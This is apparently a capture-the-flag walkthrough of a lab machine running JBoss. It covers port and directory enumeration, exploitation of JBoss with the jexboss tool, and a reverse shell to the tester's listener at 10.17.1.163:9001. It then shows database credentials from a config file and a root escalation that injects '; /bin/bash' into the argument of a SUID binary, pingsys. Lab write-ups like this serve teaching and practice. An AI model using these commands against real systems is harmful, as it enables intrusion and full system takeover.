# Enumeration
## NMAP
```nmap
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
|   256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_  256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
1090/tcp open  java-rmi    Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open  java-rmi    Java RMI
1099/tcp open  java-object Java Object Serialization
| fingerprint-strings: 
|   NULL: 
|     java.rmi.MarshalledObject|
|     hash[
|     locBytest
|     objBytesq
|     http://jacobtheboss.box:8083/q
|     org.jnp.server.NamingServer_Stub
|     java.rmi.server.RemoteStub
|     java.rmi.server.RemoteObject
|     xpw;
|     UnicastRef2
|_    jacobtheboss.box
3306/tcp open  mysql       MariaDB (unauthorized)
4444/tcp open  java-rmi    Java RMI
4445/tcp open  java-object Java Object Serialization
4446/tcp open  java-object Java Object Serialization
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss&trade;
8083/tcp open  http        JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1099-TCP:V=7.91%I=7%D=9/15%Time=6141ADFD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,16F,"\xac\xed\0\x05sr\0\x19java\.rmi\.MarshalledObject\|\xbd\x1e\x97
SF:\xedc\xfc>\x02\0\x03I\0\x04hash\[\0\x08locBytest\0\x02\[B\[\0\x08objByt
SF:esq\0~\0\x01xp\x9c\xad\x88Zur\0\x02\[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02
SF:\0\0xp\0\0\0\.\xac\xed\0\x05t\0\x1dhttp://jacobtheboss\.box:8083/q\0~\0
SF:\0q\0~\0\0uq\0~\0\x03\0\0\0\xc7\xac\xed\0\x05sr\0\x20org\.jnp\.server\.
SF:NamingServer_Stub\0\0\0\0\0\0\0\x02\x02\0\0xr\0\x1ajava\.rmi\.server\.R
SF:emoteStub\xe9\xfe\xdc\xc9\x8b\xe1e\x1a\x02\0\0xr\0\x1cjava\.rmi\.server
SF:\.RemoteObject\xd3a\xb4\x91\x0ca3\x1e\x03\0\0xpw;\0\x0bUnicastRef2\0\0\
SF:x10jacobtheboss\.box\0\0\x04J\0\0\0\0\0\0\0\0\x8cz\xe0d\0\0\x01{\xe8y\x
SF:9c\xee\x80\0\0x");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4445-TCP:V=7.91%I=7%D=9/15%Time=6141AE03%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,"\xac\xed\0\x05");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4446-TCP:V=7.91%I=7%D=9/15%Time=6141AE03%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,"\xac\xed\0\x05");

```

## Web (Port 80)
- PHP 7.3.20
- Apache 2.4.6
- No robots.txt
### Feroxbuster
```bash
403        8l       22w      205c http://jacobtheboss.box/inc
403        8l       22w      207c http://jacobtheboss.box/cache
403        8l       22w      209c http://jacobtheboss.box/plugins
301        7l       20w      238c http://jacobtheboss.box/admin
301        7l       20w      239c http://jacobtheboss.box/themes
301        7l       20w      245c http://jacobtheboss.box/admin/images
301        7l       20w      241c http://jacobtheboss.box/admin/js
302        0l        0w        0c http://jacobtheboss.box/admin/search.php
302        0l        0w        0c http://jacobtheboss.box/admin/comment.php
302        0l        0w        0c http://jacobtheboss.box/admin/plugins.php
301        7l       20w      246c http://jacobtheboss.box/admin/install
403        8l       22w      205c http://jacobtheboss.box/var
403        8l       22w      204c http://jacobtheboss.box/db
302        0l        0w        0c http://jacobtheboss.box/admin/comments.php
302        0l        0w        0c http://jacobtheboss.box/admin/help.php
302        0l        0w        0c http://jacobtheboss.box/admin/blog.php
302        0l        0w        0c http://jacobtheboss.box/admin/user.php
302        0l        0w        0c http://jacobtheboss.box/admin/category.php
302        0l        0w        0c http://jacobtheboss.box/admin/users.php
302        0l        0w        0c http://jacobtheboss.box/admin/media.php
301        7l       20w      244c http://jacobtheboss.box/admin/style
301        7l       20w      239c http://jacobtheboss.box/public
301        7l       20w      252c http://jacobtheboss.box/admin/style/install
200        2l        8w      103c http://jacobtheboss.box/admin/services.php
200      166l      317w     5214c http://jacobtheboss.box/index.php
301        7l       20w      251c http://jacobtheboss.box/admin/images/media
302        0l        0w        0c http://jacobtheboss.box/admin/index.php
200       42l      422w     5859c http://jacobtheboss.box/admin/auth.php
200       29l      108w     1497c http://jacobtheboss.box/admin/install/index.php
302        0l        0w        0c http://jacobtheboss.box/admin/blogs.php
200       49l      211w    16080c http://jacobtheboss.box/admin/js/common.js
302        0l        0w        0c http://jacobtheboss.box/admin/update.php
200       16l       49w     2734c http://jacobtheboss.box/admin/js/services.js
301        7l       20w      250c http://jacobtheboss.box/admin/images/menu
302        0l        0w        0c http://jacobtheboss.box/admin/plugin.php
301        7l       20w      247c http://jacobtheboss.box/themes/default
302        0l        0w        0c http://jacobtheboss.box/admin/categories.php
301        7l       20w      251c http://jacobtheboss.box/themes/default/img
301        7l       20w      248c http://jacobtheboss.box/admin/js/jquery
200        0l        0w        0c http://jacobtheboss.box/admin/install/check.php
302        0l        0w        0c http://jacobtheboss.box/admin/langs.php
200      665l     2038w   142433c http://jacobtheboss.box/admin/js/jquery/jquery.js
200        1l       14w      683c http://jacobtheboss.box/admin/js/_install.js
301        7l       20w      255c http://jacobtheboss.box/themes/default/smilies
301        7l       20w      240c http://jacobtheboss.box/locales
301        7l       20w      243c http://jacobtheboss.box/locales/en
301        7l       20w      243c http://jacobtheboss.box/locales/fr
301        7l       20w      248c http://jacobtheboss.box/locales/fr/help
301        7l       20w      248c http://jacobtheboss.box/locales/en/help
200        0l        0w        0c http://jacobtheboss.box/locales/fr/resources.php
```
- Most redirects to login page, no credentials.

## JAVA RMI
- NMAP says it is vulnerable
```bash
PORT     STATE SERVICE
1098/tcp open  rmiregistry
| rmi-vuln-classloader:
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|     Description:
|               Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code executeion.
|
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
```
- But when exploiting with Metasploit fails.

## Jboss (Port 8080)
- We can scan the service using [Metasploit or a custom exploit](https://book.hacktricks.xyz/pentesting/pentesting-web/jboss)

# Exploit
- I'll be using the exploit made by this [person](https://github.com/joaomatosf/jexboss)
```bash
 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                        [ OK ]
 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ VULNERABLE ]
 [*] Checking jmx-console:                    [ VULNERABLE ]
 [*] Checking JMXInvokerServlet:              [ VULNERABLE ]
```
- We then get a shell, we can get a reverse shell using a custom command.
```bash
Shell> jexremote=10.17.1.163:9001
```
```bash
16:28:21] Welcome to pwncat 🐈!                                                                      __main__.py:153
[16:30:22] received connection from 10.10.131.26:54247                                                     bind.py:76
[16:30:23] 0.0.0.0:9001: normalizing shell path                                                        manager.py:504
[16:30:26] 10.10.131.26:54247: registered new host w/ db                                   
```

# Privilege Escalation
 - We are user jacob, jacob is not in sudo'ers group
 - Possible credentials for DB
 ```php
// Database user
define('DC_DBUSER','root');

// Database password
define('DC_DBPASSWORD','')
```
```sql
+-----------+--------------------------------------------------------------+
| user_name | user_pwd                                                     |
+-----------+--------------------------------------------------------------+
| the Boss  | $2y$10$tICrvcvuwEQTwGhiT9F.6elbty1McHou9pFTFZTQL3oMqbPihr5YG |
+-----------+--------------------------------------------------------------+
```
- Did not found hash for this.

## Linpeas
- SUIDs
```bash
-rwsr-xr-x. 1 root root 8.4K Jul 30  2020 /usr/bin/pingsys (Unknown SUID binary)
-rwsr-xr-x. 1 root root 32K Oct 30  2018 /usr/bin/fusermount (Unknown SUID binary)
-rwsr-xr-x. 1 root root 77K Aug  9  2019 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 32K Apr  1  2020 /usr/bin/su
-rws--x--x. 1 root root 24K Apr  1  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x. 1 root root 41K Aug  9  2019 /usr/bin/newgrp  --->  HP-UX_10.20
-rws--x--x. 1 root root 24K Apr  1  2020 /usr/bin/chsh (Unknown SUID binary)
---s--x--x. 1 root root 144K Apr  1  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 44K Apr  1  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x. 1 root root 73K Aug  9  2019 /usr/bin/chage (Unknown SUID binary)
-rwsr-xr-x. 1 root root 32K Apr  1  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 57K Aug  8  2019 /usr/bin/crontab (Unknown SUID binary)
-rwsr-xr-x. 1 root root 24K Apr  1  2020 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x. 1 root root 28K Apr  1  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x. 1 root root 11K Apr  1  2020 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 36K Apr  1  2020 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 12K Apr  1  2020 /usr/sbin/usernetctl
-rwsr-xr-x. 1 root root 115K Apr  1  2020 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 16K Apr  1  2020 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-x---. 1 root dbus 57K Jul 13  2020 /usr/libexec/dbus-1/dbus-daemon-launch-helper (Unknown SUID binary)
```
- CRONTAB isn't usually SUID but there was no entry for gtfobins.
- /usr/bin/pingsys isn't a normal binary.
- I found this post on [securityexchange](https://security.stackexchange.com/questions/196577/privilege-escalation-c-functions-setuid0-with-system-not-working-in-linux)
```bash
pingsys '127.0.0.1; /bin/bash'
```
And we're now root! If you want to know how that worked please do read the article from stack exchange.

